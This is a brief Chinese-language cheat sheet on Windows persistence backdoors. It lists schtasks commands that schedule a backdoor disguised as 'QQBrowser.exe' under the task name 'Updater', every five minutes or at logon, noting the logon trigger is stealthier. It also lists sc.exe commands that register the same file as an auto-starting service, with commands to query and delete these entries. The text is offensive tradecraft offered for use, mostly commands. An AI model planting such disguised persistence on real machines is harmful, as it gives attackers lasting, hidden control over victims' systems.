计划任务后门
schtasks命令设定计划自动启动后门程序。
#每5分钟自动执行install.exe
schtasks /create /tn Updater /tr C:\Users\Administrator\QQBrowser.exe /sc minute /mo 5
直接启动一个定时任务
schtasks /rn /rn 任务名称
定时任务删除
schtasks /delete /tn 任务名称
时间触发过于明显,设置登陆触发更为隐蔽
schtasks /create /tn Updater /tr C:\Users\Administrator\QQBrowser.exe /sc onlogon
详细查看自启任务
schtasks /query /v /tn Updater
服务自启动后门
自启动服务一般是在电脑启动后在后台加载指定的服务程序,我们可以将exe文件注册为服务,也可以将dll文件注册为服务。
sc.exe create QQBrowser binpath= c:\Users\Public\QQBrowser.exe(注意等号后面有空格)#创建服务
sc.exe config QQBrowser start= auto #设置服务为自动启动
net start QQBrowser #启动服务
删除服务
sc.exe delete QQBrowser